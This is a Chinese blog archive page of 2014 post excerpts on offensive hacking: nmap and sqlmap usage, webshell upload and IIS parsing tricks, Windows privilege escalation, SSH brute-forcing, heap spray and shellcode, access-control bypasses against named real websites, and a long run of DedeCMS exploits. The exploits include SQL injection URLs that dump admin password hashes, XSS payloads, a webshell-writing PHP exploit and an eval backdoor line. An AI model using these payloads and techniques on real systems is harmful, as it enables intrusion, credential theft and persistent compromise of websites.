2014年3月21日
摘要: 今年美国RSA大会将在这个月的23-28号举行,每年大会上都会评出过去一年来业内最佳安全博客(Security Bloggers Network Social Security Awards 2014),该投票已于2月14日停止了投票,大奖得主将于RSA大会上公布。现在我们抢先看看都有哪些提名。(部分有重复,排名不分先后),最终结果且 听下周分解。最佳企业安全博客提名:Juniper(网络厂商,不用多介绍):http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnowNorse(提供前摄性的安全解决方案,基于dark 阅读全文
posted @ 2014-03-21 22:26 milantgh 阅读(267) 评论(0) 推荐(0)
摘要: 基本语法:#nmap [扫描方式] [命令选项] {目标}扫描目标格式:IPv4 地址: 192.168.1.1IPv6 地址:AABB:CCDD::FF%eth0主机名:www.target.tgtIP 地址范围:192.168.0-255.0-255掩码格式:192.168.0.0/16使用列表文件:-iL 设置扫描端口无端口范围时扫描1000 个常用端口-F 扫描100个最常用端口-p- 指定端口范围-p,,…. 端口列表-pU:53,U:110,T20-445 TCP&UDP结合-r 线性扫描(不是随机扫描)–top-ports 扫描n个最常用端口-p-65535 忽略初始端. 阅读全文
posted @ 2014-03-21 22:24 milantgh 阅读(327) 评论(0) 推荐(0)
摘要: 当给sqlmap这么一个url的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入。sqlmap支持的数据库有:MySQL, Or 阅读全文
posted @ 2014-03-21 22:21 milantgh 阅读(785) 评论(0) 推荐(0)
摘要: 【 拿shell 】1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cookies填到对应的框里,点击上传即可。5.当后台有数据库备份 阅读全文
posted @ 2014-03-21 22:16 milantgh 阅读(4473) 评论(0) 推荐(1)
摘要: 【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。4.cmd命令:systeminfo,看看有没有KB952004、KB95657 阅读全文
posted @ 2014-03-21 22:13 milantgh 阅读(672) 评论(0) 推荐(0)
摘要: 今天测试ssh爆破,发现使用hydra有些问题,windows版本没有协议支持其他的貌似都可以,kali本身也有hydra环境但是也会出现问题,所以就搜了一些资料贴在这里,当然这也是我测试过的,重新编译安装确实可以用了。Code:apt-get purge hydraapt-get install cmake libssl-devcd /usr/local/srcwget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gztar zxf libssh-0.4.8.tar.gzcd libssh-0.4.8mkdir buildcd build 阅读全文
posted @ 2014-03-21 22:10 milantgh 阅读(2672) 评论(0) 推荐(0)
摘要: 对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。好了,知道原因了,我们来一个一个思考解决方法(部分引用):远程桌面端口被更改解决方法:现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。对方服务器处于内网解决方法:这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“l 阅读全文
posted @ 2014-03-21 22:06 milantgh 阅读(2821) 评论(0) 推荐(0)
摘要: Heap Spray定义基本描述Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在shellcode的前面加上大量的slide code(滑板指令),组成一个注入代码段。然后向系统申请大量内存,并且反复用注入代码段来填充。这样就使得进程的地址空间被大量的注入代码所占据。然后结合其他的漏洞攻击技术控制程序流,使得程序执行到堆上,最终将导致shellcode的执行。传统slide code(滑板指令)一般是NOP指令,但是随着一些新的攻击技术的出现,逐渐开始使用更多的类NOP指令,譬如0x0C(0x0C0 阅读全文
posted @ 2014-03-21 21:24 milantgh 阅读(1211) 评论(0) 推荐(0)
摘要: #!/usr/bin/env python#-*-coding:UTF-8-*-'''快速查询md5值工具,通过模拟浏览器发包请求http://cmd5.com和http://xmd5.org两个网站进行在线查询。By Terry'''importurllibimporturllib2importreimportsysdefxmd5(hash_str):##http://xmd5.org以GET方式提交请求,模拟浏览器发送GET请求包。#xmd_url='http://www.xmd5.org/md5/search.asp?hash=&# 阅读全文
posted @ 2014-03-21 21:17 milantgh 阅读(2098) 评论(0) 推荐(0)
摘要: 上次学习了下堆喷漏洞的原理,虽说之前有学习过缓冲区溢出的原理,但还没了解过堆喷这个概念,于是趁此机会学习了,顺便复习了缓冲区溢出这块知识,之前由于各种原因对Shellcode的编写只是了解个大概,并没有真正动手写过一个Shellcode。眼前遇到个堆喷漏洞找Shellcode时就下决定自己写个Shellcode,考虑到时间和精力的有限就写个计算器简单的练练手。注:以下在XP SP3+VC6.0编译成功一、首先写个简单的调用计算器的程序。注:以下在XP SP3+VC6.0编译成功一、首先写个简单的调用计算器的程序。#include"windows.h"intmain(){Lo 阅读全文
posted @ 2014-03-21 21:13 milantgh 阅读(1593) 评论(0) 推荐(0)
摘要: Virus Maker 或者 Virus eXchanger 的简称,(有时候中文也叫做毒客),是一群追求完美、极致代码的病毒程序员。1.VXer简介:VXer热爱汇编,熟悉各种处理器架构,致力于挑战汇编编码的极限。2.中国VXer:02-04年是国内VXer 最活跃的年代,CVC 社区高手云集,气 阅读全文
posted @ 2014-03-21 20:29 milantgh 阅读(7550) 评论(0) 推荐(0)
摘要: 很多图书馆都要注册或要本地IP才能浏览或下载图书,有没有另类的快速办法能快速突破图书馆的入口,能随意地下载图书呢?希望大家在GOOGLE里试试这个:“index of/ ” inurl:lib你将进入许多图书馆,并且一定能下载自己喜欢的书籍。1、输入:“index of /” cnki ,可以找到许多图书馆的CNKI、VIP、超星等入口!2、输入:“index of /” ppt ,可以突破网站入口下载powerpint作品!3、输入:“index of /” mp3 ,可以突破网站入口下载mp3、rm等影视作品!4、输入:“index of /” swf ,可以突破网站入口下载fl... 阅读全文
posted @ 2014-03-21 17:47 milantgh 阅读(582) 评论(0) 推荐(0)
摘要: 后台:http://www.zhuna.cn/sys_admin/输入账号密码点击确定后,跳转到登录界面:http://www.zhuna.cn/sys_admin/login.php很自然的觉得后台部分页面没有访问控制,可以直接进行请求查看。(同时也怀疑可能存在JS访问绕过问题,禁用JS后再进行访问,发现依然如此,故而排除JS绕过的想法。)通过查看HTML源代码,很容易的找到菜单页面名称:http://www.zhuna.cn/sys_admin/menu.php查看menu.php页面的HTML源代码,逐个请求各超链接页面,不难发现其中部分页面是不需要身份验证的(不会跳转到登录页面):以其 阅读全文
posted @ 2014-03-21 17:35 milantgh 阅读(3712) 评论(0) 推荐(0)
摘要: 后台:http://wed.27.cn/marry/marryadmin/web/login.php不难猜解到后台管理的相关页面名称(不存在的页面服务器返回404,而存在的页面会直接跳转到上面的登录页面)。请求不存在的页面:用firefox禁用JS后请求admin.php页面,依然跳转到登录页面,说明不存在JS绕过的问题。鉴于 WooYun: 我是如何登录住哪网后台的(突破IP限制!) 的灵感,用http editor请求看看,奇迹出现了:如此是何道理?浏览器请求和工具请求没什么区别,怎么就是不一样的结果呢?工具发送的请求也不带有合法的cookie信息,排除cookie的因素,而前面也排除了J 阅读全文
posted @ 2014-03-21 16:54 milantgh 阅读(696) 评论(0) 推荐(0)
摘要: 测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');再用下面 阅读全文
posted @ 2014-03-21 15:43 milantgh 阅读(795) 评论(0) 推荐(0)
摘要: 测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!# Dede Cms All Versions Sql Vulnerability Exploit# # Date: 30/12/2011 - 13:00# Author: [ CWH ] | Finded By : Nafsh# We Are : Mr.M4st3r , Nafsh , Skote_Vahshat , HijaX# Support: Cyberwh.org# Mail: Nafsh@live.com# Software Website: http://www.dedecm 阅读全文
posted @ 2014-03-21 15:42 milantgh 阅读(429) 评论(0) 推荐(0)
摘要: 测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 阅读全文
posted @ 2014-03-21 15:41 milantgh 阅读(838) 评论(0) 推荐(0)
摘要: 漏洞版本:DEDECMS 5.3/5.6漏洞描述:DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。article_add.php 1. ........................ 2. else if($dopost=='save') 3. { 4... 阅读全文
posted @ 2014-03-21 15:38 milantgh 阅读(732) 评论(0) 推荐(0)
摘要: 漏洞版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!Dedecms v55 RCE Exploit Codz By flyh4t ---------- Dedecms v55 RCE Exploit Co 阅读全文
posted @ 2014-03-21 15:37 milantgh 阅读(2569) 评论(0) 推荐(0)
摘要: 漏洞版本:DEDECMS 5.1漏洞描述:同样是在magic_quotes_gpc=off的情况下可用此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl......$urlindex = 0;if(empty($arcID)){$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");//此处$arcurl没有过滤if(is_array($row)) 阅读全文
posted @ 2014-03-21 15:36 milantgh 阅读(1654) 评论(0) 推荐(0)
摘要: 漏洞版本:织梦(DEDE)CMS V5.3漏洞描述:织梦内容管理系统,最强大的中文开源CMS网站管理项目,使用PHP+MySQL架构。在文件include/common.inc.php中:foreach($_REQUEST as $_k=>$_v)//第10行{if( strlen($_k)>0&& eregi('^(_|cfg_|GLOBALS)',$_k)&&!isset($_COOKIE[$_k])){exit('Request var not allow!');}}//如果以cfg_开头的变量以cookie方式 阅读全文
posted @ 2014-03-21 15:35 milantgh 阅读(760) 评论(0) 推荐(0)
摘要: 漏洞版本:dedecms织梦5.5漏洞描述:北洋贱队(http://bbs.seceye.org)首发demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3E&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.gohac 阅读全文
posted @ 2014-03-21 15:34 milantgh 阅读(464) 评论(0) 推荐(0)
摘要: 漏洞版本:dedecms织梦 v5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。demo1:http://www.test.com/plus/search.php?keyword=zhuba&s 阅读全文
posted @ 2014-03-21 15:32 milantgh 阅读(796) 评论(0) 推荐(0)
摘要: 漏洞版本:Dedecms V5.6 Final漏洞描述:Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上传上去,然后通过SQL注入修改附加表的模板路径为我们上传的模板路径,模板解析类:include/inc_archives_view.php没有对模板路径及名称做任何限制,则可以成功执行恶意代码。1、member/article_edit.php文件(注入)://漏洞在member文件夹下普遍存在,$dede_addonfields是由用户提交的,可以被伪造,伪造成功即可带入sql语句,于是我们可以给附加 阅读全文
posted @ 2014-03-21 15:31 milantgh 阅读(539) 评论(0) 推荐(0)
摘要: 漏洞版本:DedeCms V5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。plus/advancedsearch.php$sql 变量未初始化。导致鸡助漏洞if($mid == 0) //必须绕过. 阅读全文
posted @ 2014-03-21 15:29 milantgh 阅读(2409) 评论(0) 推荐(0)
摘要: 漏洞版本:DedeCmsV5.6 漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。1 respond();22 ShowMsg($msg,"javascript:;",0,3000);23 exit(); 24 }25 ?>测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://www.ssvdb.com/plus/carbuyaction.ph... 阅读全文
posted @ 2014-03-21 15:27 milantgh 阅读(3760) 评论(0) 推荐(0)
摘要: 漏洞版本:DedeCmsV5.6漏洞描述:DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。edit_face.phpelse if($dopost=='delold') //45行{ if(empty($oldface)) { ShowMsg("没有可删除的头像!", "-1"); exit(); } $userdir = $cfg_u... 阅读全文
posted @ 2014-03-21 15:26 milantgh 阅读(466) 评论(0) 推荐(0)
摘要: 测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!#!usr/bin/php -w12){echo "[*] Exploit Success \n";if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php\n" ;if($aid==3)echo "[*]Sh 阅读全文
posted @ 2014-03-21 15:13 milantgh 阅读(1195) 评论(0) 推荐(0)
摘要: 影响版本:DEDECMS全版本漏洞描叙:DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。\dede\templets\login.htm65行左右" />由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储,最终导致一个XSS ROOTKIT。漏洞危害:管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。验证:1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT 阅读全文
posted @ 2014-03-21 15:11 milantgh 阅读(892) 评论(0) 推荐(0)
摘要: 测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!")};';$buffer = POST($host,80,$url,$data,30);echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";}else {echo "Sorry,target may not exist this bug.";exit;}function POST($host,$port,$path,$data,$timeout, $cookie=' 阅读全文
posted @ 2014-03-21 15:07 milantgh 阅读(1225) 评论(0) 推荐(0)
摘要: 2012/4/29 凌晨知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day,官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。知道创宇给出三种临时解决方案:方案一、临时补丁,需要四步1. 确保您的magic_quotes_gpc = On详细开启方式:打开php安装目录中的php.ini(若您使用的是appserv等集成环境,php.ini可能在系统盘符:\windows\php.ini),搜索magic_quotes_gpc,将其设置为On。2./plus/carbuyaction.p 阅读全文
posted @ 2014-03-21 15:05 milantgh 阅读(1828) 评论(0) 推荐(0)
摘要: 该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php。存在问题的代码:view source01...02if($comtype=='comments')03{04$arctitle=addslashes($title);05if($msg!='')06{//$typeid变量未做初始化07$inquery= "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,` 阅读全文
posted @ 2014-03-21 15:00 milantgh 阅读(1121) 评论(0) 推荐(0)
摘要: 简要描述:DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码详细说明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));漏洞证明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));修复方案:删除@eval(file_get_contents('php://input')); 阅读全文
posted @ 2014-03-21 14:53 milantgh 阅读(1131) 评论(0) 推荐(0)
摘要: 漏洞版本:DedeCms 5.x漏洞描述:DedeCms是免费的PHP网站内容管理系统。plus/carbuyaction.php里没有对变量进行严格的过滤出现漏洞的两个文件为:Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里Include/payment/alipay.php......function respond(){if(!empty($_POST)){foreach($_POST as $key => $data){ $_GET[$key]= $data;}}/* 引入配置文件 * 阅读全文
posted @ 2014-03-21 14:50 milantgh 阅读(1456) 评论(0) 推荐(0)
摘要: 漏洞地址及证明:/include/dialog/config.php?adminDirHand="/> 阅读全文
posted @ 2014-03-21 14:48 milantgh 阅读(338) 评论(0) 推荐(0)
摘要: 这个问题应该很久了 最近发现有用这个的蠕虫,dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码plus/flink_add.php 提交:表单中提交 图片地址http://111.cc ' onerror='alert(98);'http://111.cc 'onerror=location.href='http://www.baidu.com只用htmlspecialchars做了处理 没有判断数据有效性?1234567891011121314151617$msg = htmlspecialchars($msg 阅读全文
posted @ 2014-03-21 14:40 milantgh 阅读(345) 评论(0) 推荐(0)
摘要: EXP:Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_ 阅读全文
posted @ 2014-03-21 14:32 milantgh 阅读(1072) 评论(0) 推荐(0)
摘要: magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误在magic_quotes_gpc=On的情况下,如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。这些转义是必须的,如果这个选项为off,那么我们就必须调用addslashes这个函数来为字符串增加转义。正是因为这个选项必须为On,但是又让用户进行配置的矛盾,在PHP6中删除了这个选项,一切的编程都需要在mag 阅读全文
posted @ 2014-03-21 14:25 milantgh 阅读(596) 评论(0) 推荐(0)
摘要: 此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php12345678910111213if(isset($GLOBALS['arrs1'])){$v1=$v2='';for($i=0;isset($arrs1[$i]);$i++){$v1.=chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){$v2.= 阅读全文
posted @ 2014-03-21 14:12 milantgh 阅读(658) 评论(0) 推荐(0)
摘要: publicfunction downloads($name){ $name_tmp = explode("_",$name); $type = $name_tmp[0]; $file_time = explode(".",$name_tmp[3]); $file_time = $file_time[0]; $file_date = date("Y/md",$file_time); $file_dir = SITE_PATH."/data/uploads/$type/$file_date/";if(!file_ex 阅读全文
posted @ 2014-03-21 14:07 milantgh 阅读(472) 评论(0) 推荐(0)